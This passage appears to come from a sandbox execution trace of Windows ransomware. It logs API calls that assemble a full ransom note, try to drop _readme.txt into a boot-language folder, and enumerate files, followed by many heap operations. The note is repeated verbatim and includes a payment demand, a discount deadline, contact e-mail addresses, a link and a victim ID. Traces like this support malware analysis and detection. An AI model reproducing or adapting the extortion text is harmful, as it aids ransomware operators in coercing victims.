tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0174.734] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0174.734] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d16e48 [0174.734] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0174.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d16e48 | out: hHeap=0x6a0000) returned 1 [0174.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d30670 | out: hHeap=0x6a0000) returned 1 [0174.735] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.736] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.736] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*" (normalized: "c:\\boot\\it-it\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0174.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28daa640, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0174.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0174.737] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956aa140, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28daa640, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0174.737] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.737] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.738] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.738] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.738] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.739] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.740] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.740] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.741] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.741] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.742] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.742] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.743] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.743] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.744] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.744] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.745] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.746] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.746] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.748] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.748] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.749] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.750] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.750] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.751] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.751] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.753] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.754] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.754] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.755] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.755] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.758] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.759] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.760] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0174.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.761] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.761] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.762] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.762] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0174.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.763] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.763] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.764] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0174.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.765] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0174.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277c0 [0174.766] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: 